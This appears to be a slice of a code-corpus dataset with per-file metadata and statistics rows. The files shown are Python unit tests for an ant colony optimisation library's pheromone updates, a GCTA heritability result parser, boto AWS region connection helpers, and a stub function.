| 34.449505 | 103 | 0.587285 | 2,333 | 17,397 | 4.214745 | 0.099871 | 0.039866 | 0.02573 | 0.042103 | 0.81257 | 0.807587 | 0.804841 | 0.804841 | 0.804841 | 0.80057 | 0 | 0.014526 | 0.291659 | 17,397 | 504 | 104 | 34.517857 | 0.783413 | 0.225039 | 0 | 0.761589 | 0 | 0 | 0.046193 | 0 | 0 | 0 | 0 | 0 | 0.05298 | 1 | 0.092715 | false | 0 | 0.029801 | 0 | 0.327815 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
94ad9e1d811ff85e4d890486f842645de368f41c | 18,868 | py | Python | test/c_pheromone.py | FernandoGaGu/Ant-Colony-Optimisation | e1a1ee27f55c63c768964e80f38020f1aef664d7 | [
"BSD-3-Clause"
] | 1 | 2021-09-09T04:14:06.000Z | 2021-09-09T04:14:06.000Z | test/c_pheromone.py | FernandoGaGu/Ant-Colony-Optimisation | e1a1ee27f55c63c768964e80f38020f1aef664d7 | [
"BSD-3-Clause"
] | null | null | null | test/c_pheromone.py | FernandoGaGu/Ant-Colony-Optimisation | e1a1ee27f55c63c768964e80f38020f1aef664d7 | [
"BSD-3-Clause"
] | null | null | null | import numpy as np
from copy import deepcopy
from antco import (
updateUndAS,
updateDirAS,
updateUndMMAS,
updateDirMMAS,
updateUndEliteMMAS,
updateDirEliteMMAS,
updateDirEliteAS,
updateUndEliteAS,
updateDirLocalPher,
updateUndLocalPher,
updateUndACS,
updateDirACS)
from antco import Ant
def test_directed_AS_update():
""" antco.pheromone.updateDirAS() unit testing """
np.random.seed(1997)
evaporation = 0.2
P_t0 = np.random.uniform(size=(4, 4)).astype(np.float64)
np.fill_diagonal(P_t0, 0)
P_t0 = (P_t0 + P_t0.T) / 2 # Symmetric matrix
paths = np.array([
# Ant 1
[[0, 1, 0, 1],
[1, 0, 0, 0],
[0, 0, 0, 1],
[1, 0, 1, 0]],
# Ant 2
[[0, 1, 0, 1],
[1, 0, 0, 0],
[0, 0, 0, 1],
[1, 0, 1, 0]],
# Ant 3
[[0, 0, 0, 1],
[0, 0, 0, 1],
[0, 0, 0, 1],
[1, 1, 1, 0]]], dtype=np.int8)
expected = np.array([
[0.0, 0.9267931249792329, 0.4776117072586296, 1.6791352931971335],
[0.9267931249792329, 0.0, 0.5591658434565883, 0.7150135839042728],
[0.4776117072586296, 0.5591658434565883, 0.0, 1.0865920636193305],
[1.6791352931971335, 0.7150135839042728, 1.0865920636193305, 0.0]], dtype=np.float64)
ant_scores = np.array([0.2, 0.3, 0.4], dtype=np.float64)
updateDirAS(paths=paths, P=P_t0, ant_scores=ant_scores, rho=evaporation, weight=1.0)
assert np.all(np.round(P_t0, decimals=4) == np.round(expected, decimals=4)), \
'FAILED TEST: antco.pheromone.updateDirAS()'
print('SUCCESSFUL TEST: antco.pheromone.updateDirAS()')
def test_undirected_AS_update():
""" antco.pheromone.updateUndAS() unit testing """
np.random.seed(1997)
evaporation = 0.2
P_t0 = np.random.uniform(size=(4, 4)).astype(np.float64)
np.fill_diagonal(P_t0, 0)
P_t0 = (P_t0 + P_t0.T)/2 # Symmetric matrix
paths = np.array([
# Ant 1
[[0, 1, 0, 1],
[1, 0, 0, 0],
[0, 0, 0, 1],
[1, 0, 1, 0]],
# Ant 2
[[0, 1, 0, 1],
[1, 0, 0, 0],
[0, 0, 0, 1],
[1, 0, 1, 0]],
# Ant 3
[[0, 0, 0, 1],
[0, 0, 0, 1],
[0, 0, 0, 1],
[1, 1, 1, 0]]], dtype=np.int8)
expected = np.array([
[0.0, 0.9267931249792329, 0.4776117072586296, 1.6791352931971335],
[0.9267931249792329, 0.0, 0.5591658434565883, 0.7150135839042728],
[0.4776117072586296, 0.5591658434565883, 0.0, 1.0865920636193305],
[1.6791352931971335, 0.7150135839042728, 1.0865920636193305, 0.0]], dtype=np.float64)
ant_scores = np.array([0.2, 0.3, 0.4]).astype(np.float64)
updateUndAS(paths=paths, P=P_t0, ant_scores=ant_scores, rho=evaporation, weight=1.0)
assert np.all(np.round(P_t0, decimals=4) == np.round(expected, decimals=4)), \
'FAILED TEST: antco.pheromone.updateUndAS()'
print('SUCCESSFUL TEST: antco.pheromone.updateUndAS()')
def test_directed_AS_elite_update():
""" antco.pheromone.updateDirEliteAS() unit testing """
np.random.seed(1997)
evaporation = 0.2
P_t0 = np.random.uniform(size=(4, 4)).astype(np.float64)
np.fill_diagonal(P_t0, 0)
P_t0 = (P_t0 + P_t0.T) / 2 # Symmetric matrix
paths = np.array([
# Ant 1
[[0, 1, 0, 1],
[1, 0, 0, 0],
[1, 0, 0, 1],
[1, 0, 1, 0]],
# Ant 2
[[0, 1, 1, 1],
[1, 0, 0, 0],
[0, 0, 0, 1],
[1, 0, 1, 0]],
# Ant 3
[[0, 0, 0, 1],
[0, 0, 0, 1],
[0, 0, 0, 1],
[1, 1, 1, 0]]], dtype=np.int8)
expected = np.array([
[0.0, 0.6414344987114436, 0.6820893643835099, 1.2433082310436099],
[0.6414344987114436, 0.0, 0.4473326730988265, 0.5720108649925117],
[0.3820893643835099, 0.4473326730988265, 0.0, 0.7692736491472838],
[1.2433082310436099, 0.5720108649925117, 0.7692736491472838, 0.0]],
dtype=np.float64)
ant_scores = np.array([0.2, 0.3, 0.4], dtype=np.float64)
updateDirEliteAS(
paths=paths, P=P_t0, ant_scores=ant_scores, rho=evaporation, elite=2, weight=1.0)
assert np.all(np.round(P_t0, decimals=4) == np.round(expected, decimals=4)), \
'FAILED TEST: antco.pheromone.directed_AS_elite__update()'
print('SUCCESSFUL TEST: antco.pheromone.updateDirEliteAS()')
def test_undirected_AS_elite_update():
""" antco.pheromone.updateUndEliteAS() unit testing """
np.random.seed(1997)
evaporation = 0.2
P_t0 = np.random.uniform(size=(4, 4)).astype(np.float64)
np.fill_diagonal(P_t0, 0)
P_t0 = (P_t0 + P_t0.T)/2 # Symmetric matrix
paths = np.array([
# Ant 1
[[0, 1, 1, 1],
[1, 0, 0, 0],
[1, 0, 0, 1],
[1, 0, 1, 0]],
# Ant 2
[[0, 1, 0, 1],
[1, 0, 1, 0],
[0, 1, 0, 1],
[1, 0, 1, 0]],
# Ant 3
[[0, 0, 0, 1],
[0, 0, 0, 1],
[0, 0, 0, 1],
[1, 1, 1, 0]]], dtype=np.int8)
expected = np.array([
[0.0, 0.6414344987114436, 0.3820893643835099, 1.2433082310436099],
[0.6414344987114436, 0.0, 0.7473326730988266, 0.5720108649925117],
[0.3820893643835099, 0.7473326730988266, 0.0, 0.7692736491472838],
[1.2433082310436099, 0.5720108649925117, 0.7692736491472838, 0.0]],
dtype=np.float64)
ant_scores = np.array([0.2, 0.3, 0.4]).astype(np.float64)
updateUndEliteAS(
paths=paths, P=P_t0, ant_scores=ant_scores, rho=evaporation, elite=2, weight=1.0)
assert np.all(np.round(P_t0, decimals=4) == np.round(expected, decimals=4)), \
'FAILED TEST: antco.pheromone.updateUndEliteAS()'
print('SUCCESSFUL TEST: antco.pheromone.updateUndEliteAS()')
def test_directed_MMAS_update():
""" aco.pheromone.directed_mmas_update() unit testing """
np.random.seed(1997)
evaporation = 0.2
P_t0 = np.random.uniform(size=(4, 4)).astype(np.float64)
np.fill_diagonal(P_t0, 0)
P_t0 = (P_t0 + P_t0.T) / 2 # Symmetric matrix
paths = np.array([
# Ant 1
[[0, 1, 0, 1],
[1, 0, 0, 0],
[0, 0, 0, 1],
[1, 0, 1, 0]],
# Ant 2
[[0, 1, 0, 1],
[1, 0, 0, 0],
[0, 0, 0, 1],
[1, 0, 1, 0]],
# Ant 3
[[0, 0, 0, 1],
[0, 0, 0, 0],
[0, 0, 0, 1],
[1, 1, 1, 0]]], dtype=np.int8)
expected = np.array([
[0.0, 0.4267931249792329, 0.4776117072586296, 1.1791352931971335],
[0.4267931249792329, 0.0, 0.5591658434565883, 0.3150135839042728],
[0.4776117072586296, 0.5591658434565883, 0.0, 0.5865920636193305],
[1.1791352931971335, 0.7150135839042728, 0.5865920636193305, 0.0]], np.float64)
ant_scores = np.array([0.2, 0.3, 0.4], dtype=np.float64)
updateDirMMAS(
paths=paths, P=P_t0, ant_scores=ant_scores, rho=evaporation, limits=(0, 2), weight=1.0)
assert np.all(np.round(P_t0, decimals=4) == np.round(expected, decimals=4)), \
'FAILED TEST: antco.pheromone.updateDirMMAS()'
expected2 = np.array([
[0.0, 0.34143449871144366, 0.3820893643835099, 1.1433082310436098],
[0.34143449871144366, 0.0, 0.4473326730988265, 0.2520108661846046],
[0.3820893643835099, 0.4473326730988265, 0.0, 0.6692736491472838],
[1.1433082310436098, 0.7720108649925117, 0.6692736491472838, 0.0]], np.float64)
updateDirMMAS(
paths=paths, P=P_t0, ant_scores=ant_scores, rho=evaporation, limits=(0, 2), weight=0.5)
assert np.all(np.round(P_t0, decimals=4) == np.round(expected2, decimals=4)), \
'FAILED TEST: antco.pheromone.updateDirMMAS()'
print('SUCCESSFUL TEST: antco.pheromone.updateDirMMAS()')
def test_directed_MMAS_elite_update():
""" aco.pheromone.directed_mmas_elite_update() unit testing """
np.random.seed(1997)
evaporation = 0.2
P_t0 = np.random.uniform(size=(4, 4)).astype(np.float64)
np.fill_diagonal(P_t0, 0)
P_t0 = (P_t0 + P_t0.T) / 2 # Symmetric matrix
paths = np.array([
# Ant 1
[[0, 1, 0, 1],
[1, 0, 0, 0],
[0, 0, 0, 1],
[1, 0, 1, 0]],
# Ant 2
[[0, 1, 1, 1],
[1, 0, 0, 0],
[0, 0, 0, 1],
[1, 0, 1, 0]],
# Ant 3
[[0, 0, 0, 1],
[0, 0, 0, 0],
[0, 0, 0, 1],
[1, 1, 1, 0]]], dtype=np.int8)
expected = np.array([
[0.0, 0.6414344987114436, 0.6820893643835099, 1.2433082310436099],
[0.6414344987114436, 0.0, 0.4473326730988265, 0.2520108661846046],
[0.3820893643835099, 0.4473326730988265, 0.0, 0.7692736491472838],
[1.2433082310436099, 0.5720108649925117, 0.7692736491472838, 0.0]], np.float64)
ant_scores = np.array([0.2, 0.3, 0.4], dtype=np.float64)
updateDirEliteMMAS(
paths=paths, P=P_t0, ant_scores=ant_scores, rho=evaporation, limits=(0, 2), elite=2,
weight=1.0)
assert np.all(np.round(P_t0, decimals=4) == np.round(expected, decimals=4)), \
'FAILED TEST: antco.pheromone.updateDirEliteMMAS()'
print('SUCCESSFUL TEST: antco.pheromone.updateDirEliteMMAS()')
def test_undirected_MMAS_update():
""" aco.pheromone.undirected_mmas_update() unit testing """
np.random.seed(1997)
evaporation = 0.2
P_t0 = np.random.uniform(size=(4, 4)).astype(np.float64)
np.fill_diagonal(P_t0, 0)
P_t0 = (P_t0 + P_t0.T) / 2 # Symmetric matrix
paths = np.array([
# Ant 1
[[0, 1, 0, 1],
[1, 0, 0, 0],
[0, 0, 0, 1],
[1, 0, 1, 0]],
# Ant 2
[[0, 1, 0, 1],
[1, 0, 0, 0],
[0, 0, 0, 1],
[1, 0, 1, 0]],
# Ant 3
[[0, 0, 0, 1],
[0, 0, 0, 1],
[0, 0, 0, 1],
[1, 1, 1, 0]]], dtype=np.int8)
expected = np.array([
[0.0, 0.4267931249792329, 0.4776117072586296, 1.1791352931971335],
[0.4267931249792329, 0.0, 0.5591658434565883, 0.7150135839042728],
[0.4776117072586296, 0.5591658434565883, 0.0, 0.5865920636193305],
[1.1791352931971335, 0.7150135839042728, 0.5865920636193305, 0.0]],
dtype=np.float64)
ant_scores = np.array([0.2, 0.3, 0.4], dtype=np.float64)
updateUndMMAS(
paths=paths, P=P_t0, ant_scores=ant_scores, rho=evaporation, limits=(0, 2), weight=1.0)
assert np.all(np.round(P_t0, decimals=4) == np.round(expected, decimals=4)), \
'FAILED TEST: antco.pheromone.updateUndMMAS()'
expected2 = np.array([
[0.0, 0.34143449871144366, 0.3820893643835099, 1.1433082310436098],
[0.34143449871144366, 0.0, 0.4473326730988265, 0.7720108649925117],
[0.3820893643835099, 0.4473326730988265, 0.0, 0.6692736491472838],
[1.1433082310436098, 0.7720108649925117, 0.6692736491472838, 0.0]],
dtype=np.float64)
updateUndMMAS(
paths=paths, P=P_t0, ant_scores=ant_scores, rho=evaporation, limits=(0, 2), weight=0.5)
assert np.all(np.round(P_t0, decimals=4) == np.round(expected2, decimals=4)), \
'FAILED TEST: antco.pheromone.updateUndMMAS()'
print('SUCCESSFUL TEST: antco.pheromone.undirected_mmas_update()')
def test_undirected_MMAS_elite_update():
""" antco.pheromone.updateUndEliteMMAS() unit testing """
np.random.seed(1997)
evaporation = 0.2
P_t0 = np.random.uniform(size=(4, 4)).astype(np.float64)
np.fill_diagonal(P_t0, 0)
P_t0 = (P_t0 + P_t0.T) / 2 # Symmetric matrix
paths = np.array([
# Ant 1
[[0, 1, 0, 1],
[1, 0, 0, 0],
[0, 0, 0, 1],
[1, 0, 1, 0]],
# Ant 2
[[0, 1, 0, 1],
[1, 0, 1, 0],
[0, 1, 0, 1],
[1, 0, 1, 0]],
# Ant 3
[[0, 0, 0, 1],
[0, 0, 0, 1],
[0, 0, 0, 1],
[1, 1, 1, 0]]], dtype=np.int8)
expected = np.array([
[0.0, 0.6414344987114436, 0.3820893643835099, 1.2433082310436099],
[0.6414344987114436, 0.0, 0.7473326730988266, 0.5720108649925117],
[0.3820893643835099, 0.7473326730988266, 0.0, 0.7692736491472838],
[1.2433082310436099, 0.5720108649925117, 0.7692736491472838, 0.0]],
dtype=np.float64)
ant_scores = np.array([0.2, 0.3, 0.4], dtype=np.float64)
updateUndEliteMMAS(
paths=paths, P=P_t0, ant_scores=ant_scores, rho=evaporation, limits=(0, 2), elite=2, weight=1.0)
assert np.all(np.round(P_t0, decimals=4) == np.round(expected, decimals=4)), \
'FAILED TEST: antco.pheromone.updateUndEliteMMAS()'
print('SUCCESSFUL TEST: antco.pheromone.updateUndEliteMMAS()')
def test_undirected_local_update():
np.random.seed(1997)
decay = 0.2
init_val = 1.0
P = np.random.uniform(low=1.0, high=3.0, size=(4, 4)).astype(np.float64)
np.fill_diagonal(P, 0)
P = (P + P.T) / 2 # Symmetric matrix
P_t0 = deepcopy(P)
ant1 = Ant(l_min=0, l_max=5, graph_type='u'); ant1.initAdjMatrix(4)
ant2 = Ant(l_min=0, l_max=5, graph_type='u'); ant2.initAdjMatrix(4)
ant3 = Ant(l_min=0, l_max=5, graph_type='u'); ant3.initAdjMatrix(4)
ant1.visited_nodes = [0, 2, 3]
ant2.visited_nodes = [0, 1, 2]
ant3.visited_nodes = [3, 0, 2]
updateUndLocalPher(ant1, P, decay, init_val)
assert P_t0[0, 0] == P[0, 0], 'FAILED TEST: antco.pheromone.updateUndLocalPher()'
assert P_t0[2, 3] > P[2, 3], 'FAILED TEST: antco.pheromone.updateUndLocalPher()'
assert P_t0[3, 2] > P[3, 2], 'FAILED TEST: antco.pheromone.updateUndLocalPher()'
P_t0 = deepcopy(P)
updateUndLocalPher(ant2, P, decay, init_val)
assert P_t0[2, 3] == P[2, 3], 'FAILED TEST: antco.pheromone.updateUndLocalPher()'
assert P_t0[1, 2] > P[1, 2], 'FAILED TEST: antco.pheromone.updateUndLocalPher()'
assert P_t0[2, 1] > P[2, 1], 'FAILED TEST: antco.pheromone.updateUndLocalPher()'
P_t0 = deepcopy(P)
updateUndLocalPher(ant3, P, decay, init_val)
assert P_t0[1, 2] == P[1, 2], 'FAILED TEST: antco.pheromone.updateUndLocalPher()'
assert P_t0[0, 2] > P[0, 2], 'FAILED TEST: antco.pheromone.updateUndLocalPher()'
assert P_t0[2, 0] > P[2, 0], 'FAILED TEST: antco.pheromone.updateUndLocalPher()'
print('SUCCESSFUL TEST: antco.pheromone.updateUndLocalPher()')
def test_directed_local_update():
np.random.seed(1997)
decay = 0.2
init_val = 1.0
P = np.random.uniform(low=1.0, high=3.0, size=(4, 4)).astype(np.float64)
np.fill_diagonal(P, 0)
P = (P + P.T) / 2 # Symmetric matrix
P_t0 = deepcopy(P)
ant1 = Ant(l_min=0, l_max=5, graph_type='d'); ant1.initAdjMatrix(4)
ant2 = Ant(l_min=0, l_max=5, graph_type='u'); ant2.initAdjMatrix(4)
ant3 = Ant(l_min=0, l_max=5, graph_type='u'); ant3.initAdjMatrix(4)
ant1.visited_nodes = [0, 2, 3]
ant2.visited_nodes = [0, 1, 2]
ant3.visited_nodes = [3, 0, 2]
updateDirLocalPher(ant1, P, decay, init_val)
assert P_t0[0, 0] == P[0, 0], 'FAILED TEST: antco.pheromone.updateDirLocalPher()'
assert P_t0[2, 3] > P[2, 3], 'FAILED TEST: antco.pheromone.updateDirLocalPher()'
assert P_t0[3, 2] == P[3, 2], 'FAILED TEST: antco.pheromone.updateDirLocalPher()'
P_t0 = deepcopy(P)
updateDirLocalPher(ant2, P, decay, init_val)
assert P_t0[2, 3] == P[2, 3], 'FAILED TEST: antco.pheromone.updateDirLocalPher()'
assert P_t0[1, 2] > P[1, 2], 'FAILED TEST: antco.pheromone.updateDirLocalPher()'
assert P_t0[2, 1] == P[2, 1], 'FAILED TEST: antco.pheromone.updateDirLocalPher()'
P_t0 = deepcopy(P)
updateDirLocalPher(ant3, P, decay, init_val)
assert P_t0[1, 2] == P[1, 2], 'FAILED TEST: antco.pheromone.updateDirLocalPher()'
assert P_t0[0, 2] > P[0, 2], 'FAILED TEST: antco.pheromone.updateDirLocalPher()'
assert P_t0[2, 0] == P[2, 0], 'FAILED TEST: antco.pheromone.updateDirLocalPher()'
print('SUCCESSFUL TEST: antco.pheromone.updateDirLocalPher()')
def test_undirected_ACS():
np.random.seed(1997)
evaporation = 0.2
P_t0 = np.random.uniform(size=(4, 4)).astype(np.float64)
np.fill_diagonal(P_t0, 0)
P_t0 = (P_t0 + P_t0.T) / 2 # Symmetric matrix
paths = np.array([
# Ant 1
[[0, 1, 0, 1],
[1, 0, 0, 0],
[0, 0, 0, 1],
[1, 0, 1, 0]],
# Ant 2
[[0, 1, 0, 1],
[1, 0, 1, 0],
[0, 1, 0, 1],
[1, 0, 1, 0]],
# Ant 3
[[0, 0, 0, 1],
[0, 0, 0, 1],
[0, 0, 0, 1],
[1, 1, 1, 0]]], dtype=np.int8)
expected = np.array([
[0.0, 0.5334914082114515, 0.5970146362973399, 1.1591352988595747],
[0.5334914082114515, 0.0, 0.6989573069245543, 0.695013589566714],
[0.5970146362973399, 0.6989573069245543, 0.0, 0.5665920692817716],
[1.1591352988595747, 0.695013589566714, 0.5665920692817716, 0.0]],
dtype=np.float64)
ant_scores = np.array([0.2, 0.3, 1.9], dtype=np.float64)
updateUndACS(paths=paths, P=P_t0, ant_scores=ant_scores, rho=evaporation, weight=1.0)
assert np.all(np.round(P_t0, decimals=4) == np.round(expected, decimals=4)), \
'FAILED TEST: antco.pheromone.updateUndACS()'
print('SUCCESSFUL TEST: antco.pheromone.updateUndACS()')
def test_directed_ACS():
np.random.seed(1997)
evaporation = 0.2
P_t0 = np.random.uniform(size=(4, 4)).astype(np.float64)
np.fill_diagonal(P_t0, 0)
P_t0 = (P_t0 + P_t0.T) / 2 # Symmetric matrix
paths = np.array([
# Ant 1
[[0, 1, 0, 1],
[0, 0, 0, 0],
[0, 0, 0, 1],
[0, 0, 0, 0]],
# Ant 2
[[0, 1, 0, 1],
[1, 0, 1, 0],
[0, 1, 0, 1],
[1, 0, 1, 0]],
# Ant 3
[[0, 0, 0, 1],
[0, 0, 0, 1],
[0, 0, 0, 1],
[1, 1, 1, 0]]], dtype=np.int8)
expected = np.array([
[0.0, 0.6667931285555115, 0.5970146362973399, 1.0191352967734122],
[0.5334914082114515, 0.0, 0.6989573069245543, 0.3937669813472373],
[0.5970146362973399, 0.6989573069245543, 0.0, 0.42659206719560916],
[0.9739191201245483, 0.3937669813472373, 0.23324008039305005, 0.0]],
dtype=np.float64)
ant_scores = np.array([0.8, 0.3, 0.2], dtype=np.float64)
updateDirACS(paths=paths, P=P_t0, ant_scores=ant_scores, rho=evaporation, weight=1.5)
assert np.all(np.round(P_t0, decimals=4) == np.round(expected, decimals=4)), \
'FAILED TEST: antco.pheromone.updateDirACS()'
print('SUCCESSFUL TEST: antco.pheromone.updateDirACS()')
def test():
test_directed_AS_update()
test_undirected_AS_update()
test_directed_AS_elite_update()
test_undirected_AS_elite_update()
test_directed_MMAS_update()
test_directed_MMAS_elite_update()
test_undirected_MMAS_update()
test_undirected_MMAS_elite_update()
test_undirected_local_update()
test_directed_local_update()
test_undirected_ACS()
test_directed_ACS()
| 35.466165 | 104 | 0.588722 | 2,714 | 18,868 | 3.99521 | 0.046794 | 0.043161 | 0.036245 | 0.019183 | 0.862584 | 0.794891 | 0.791571 | 0.773126 | 0.772757 | 0.769437 | 0 | 0.2541 | 0.243693 | 18,868 | 531 | 105 | 35.532957 | 0.505746 | 0.041446 | 0 | 0.706601 | 0 | 0 | 0.113359 | 0.080018 | 0 | 0 | 0 | 0 | 0.07335 | 1 | 0.031785 | false | 0 | 0.00978 | 0 | 0.041565 | 0.02934 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
94e5d42ec03fb47d69e5a87aff97b27ca817ae76 | 2,823 | py | Python | limix_ext/gcta/core/result.py | glimix/limix-ext | 7cf7a3b2b02f6a73cbba90f1945a06b9295b7357 | [
"MIT"
] | null | null | null | limix_ext/gcta/core/result.py | glimix/limix-ext | 7cf7a3b2b02f6a73cbba90f1945a06b9295b7357 | [
"MIT"
] | 2 | 2017-06-05T08:29:22.000Z | 2017-06-07T16:54:54.000Z | limix_ext/gcta/core/result.py | glimix/limix-ext | 7cf7a3b2b02f6a73cbba90f1945a06b9295b7357 | [
"MIT"
] | null | null | null | import re
import numpy as np
class Result(object):
def __init__(self, filename):
with open(filename, 'r') as f:
f.readline()
line = f.readline().split('\t')
self.var_g = float(line[1])
self.var_g_se = float(line[2])
line = f.readline().split('\t')
self.var_n = float(line[1])
self.var_n_se = float(line[2])
line = f.readline().split('\t')
self.var_total = float(line[1])
self.var_total_se = float(line[2])
f.readline()
f.readline()
line = f.readline()
match = re.match(
r'.* in the sample = (.*); User-specified disease prevalence = (.*)\).*',
line)
self.prevalence_in_sample = float(match.group(1))
self.prevalence_specified = float(match.group(2))
line = f.readline()
self._heritability_liability_scale = float(line.split('\t')[1])
if np.abs(self.var_g + self.var_n - self.var_total) > 1e-5:
raise Exception(
"Total variance differ from var_g + var_n: %.6f." %
np.abs(self.var_g + self.var_n - self.var_total))
@property
def heritability_liability_scale(self):
return self._heritability_liability_scale
@property
def heritability_observed_scale(self):
return self.var_g / self.var_total
# def __str__(self):
# return tabulate([['genetic var', self.var_g],
# ['noise var', self.var_n],
# ['total var', self.var_total],
# ['heritability', self.heritability]])
class ResultContinuous(object):
def __init__(self, filename):
with open(filename, 'r') as f:
f.readline()
line = f.readline().split('\t')
self.var_g = float(line[1])
self.var_g_se = float(line[2])
line = f.readline().split('\t')
self.var_n = float(line[1])
self.var_n_se = float(line[2])
line = f.readline().split('\t')
self.var_total = float(line[1])
self.var_total_se = float(line[2])
line = f.readline().split('\t')
self._heritability_liability_scale = float(line[1])
@property
def heritability_liability_scale(self):
return self._heritability_liability_scale
@property
def heritability_observed_scale(self):
return self.var_g / self.var_total
# def __str__(self):
# return tabulate([['genetic var', self.var_g],
# ['noise var', self.var_n],
# ['total var', self.var_total],
# ['heritability', self.heritability]])
| 31.366667 | 89 | 0.529933 | 332 | 2,823 | 4.28012 | 0.174699 | 0.137931 | 0.056298 | 0.08867 | 0.808586 | 0.793103 | 0.741027 | 0.741027 | 0.741027 | 0.741027 | 0 | 0.01015 | 0.336876 | 2,823 | 89 | 90 | 31.719101 | 0.748932 | 0.161176 | 0 | 0.732143 | 0 | 0 | 0.056852 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.107143 | false | 0 | 0.035714 | 0.071429 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
bf68ff1a5312329738f06cd4cf6e2a2f44777a9f | 2,864 | py | Python | __init__.py | gongchengshi/aws | d04d42739e026d2e99936dd046be05293e063e08 | [
"MIT"
] | null | null | null | __init__.py | gongchengshi/aws | d04d42739e026d2e99936dd046be05293e063e08 | [
"MIT"
] | null | null | null | __init__.py | gongchengshi/aws | d04d42739e026d2e99936dd046be05293e063e08 | [
"MIT"
] | null | null | null | import boto
import boto.ec2
import boto.ec2.cloudwatch
import boto.sdb
import boto.sqs
import boto.dynamodb
import boto.sns
from boto.s3.connection import S3Connection
from aws.constants import AwsAccessKey, AwsSecretKey
class USWest2:
region = 'us-west-2'
@staticmethod
def sdb():
return boto.sdb.connect_to_region(USWest2.region,
aws_access_key_id=AwsAccessKey, aws_secret_access_key=AwsSecretKey)
@staticmethod
def ddb():
return boto.dynamodb.connect_to_region(USWest2.region,
aws_access_key_id=AwsAccessKey, aws_secret_access_key=AwsSecretKey)
@staticmethod
def ec2():
return boto.ec2.connect_to_region(USWest2.region,
aws_access_key_id=AwsAccessKey, aws_secret_access_key=AwsSecretKey)
@staticmethod
def cloudwatch():
return boto.ec2.cloudwatch.connect_to_region(USWest2.region,
aws_access_key_id=AwsAccessKey, aws_secret_access_key=AwsSecretKey)
@staticmethod
def sqs():
return boto.sqs.connect_to_region(USWest2.region,
aws_access_key_id=AwsAccessKey, aws_secret_access_key=AwsSecretKey)
@staticmethod
def s3():
return boto.s3.connect_to_region(USWest2.region,
aws_access_key_id=AwsAccessKey, aws_secret_access_key=AwsSecretKey)
@staticmethod
def sns():
return boto.sns.connect_to_region(USWest2.region,
aws_access_key_id=AwsAccessKey, aws_secret_access_key=AwsSecretKey)
class USEast1:
region = 'us-east-1'
@staticmethod
def sdb():
return boto.sdb.connect_to_region(USEast1.region,
aws_access_key_id=AwsAccessKey, aws_secret_access_key=AwsSecretKey)
@staticmethod
def ddb():
return boto.dynamodb.connect_to_region(USEast1.region,
aws_access_key_id=AwsAccessKey, aws_secret_access_key=AwsSecretKey)
@staticmethod
def ec2():
return boto.ec2.connect_to_region(USEast1.region,
aws_access_key_id=AwsAccessKey, aws_secret_access_key=AwsSecretKey)
@staticmethod
def sqs():
return boto.sqs.connect_to_region(USEast1.region,
aws_access_key_id=AwsAccessKey, aws_secret_access_key=AwsSecretKey)
@staticmethod
def s3():
return S3Connection(AwsAccessKey, AwsSecretKey)
@staticmethod
def sns():
return boto.sns.connect_to_region(USEast1.region,
aws_access_key_id=AwsAccessKey, aws_secret_access_key=AwsSecretKey) | 34.926829 | 120 | 0.627444 | 305 | 2,864 | 5.577049 | 0.114754 | 0.126984 | 0.10582 | 0.126984 | 0.823633 | 0.823633 | 0.823633 | 0.823633 | 0.823633 | 0.787184 | 0 | 0.014617 | 0.307263 | 2,864 | 82 | 121 | 34.926829 | 0.842742 | 0 | 0 | 0.578125 | 0 | 0 | 0.006283 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.203125 | false | 0 | 0.140625 | 0.203125 | 0.609375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 9 |
bf961a09fd659a714441e349113514bcd6b5b789 | 130 | py | Python | 2-resources/Lambda-weeks/m7/71e1/cs-sprint-challenge-hash-tables-master/hashtables/ex1/ex1.py | eengineergz/Lambda | 1fe511f7ef550aed998b75c18a432abf6ab41c5f | [
"MIT"
] | null | null | null | 2-resources/Lambda-weeks/m7/71e1/cs-sprint-challenge-hash-tables-master/hashtables/ex1/ex1.py | eengineergz/Lambda | 1fe511f7ef550aed998b75c18a432abf6ab41c5f | [
"MIT"
] | null | null | null | 2-resources/Lambda-weeks/m7/71e1/cs-sprint-challenge-hash-tables-master/hashtables/ex1/ex1.py | eengineergz/Lambda | 1fe511f7ef550aed998b75c18a432abf6ab41c5f | [
"MIT"
] | null | null | null | def get_indices_of_item_weights(weights, length, limit):
"""
YOUR CODE HERE
"""
# Your code here
return None
| 16.25 | 56 | 0.630769 | 17 | 130 | 4.588235 | 0.764706 | 0.205128 | 0.307692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.276923 | 130 | 7 | 57 | 18.571429 | 0.829787 | 0.230769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.285714 | 0 | 1 | 0.5 | false | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
449c4a6f0088490c5bd439693d0f042a1c75de71 | 109 | py | Python | face_detector_ssd/model_provider.py | keiji/face_detector_with_tensorflow | 36a440b177c2decaa34ec8cd0311a8283969d932 | [
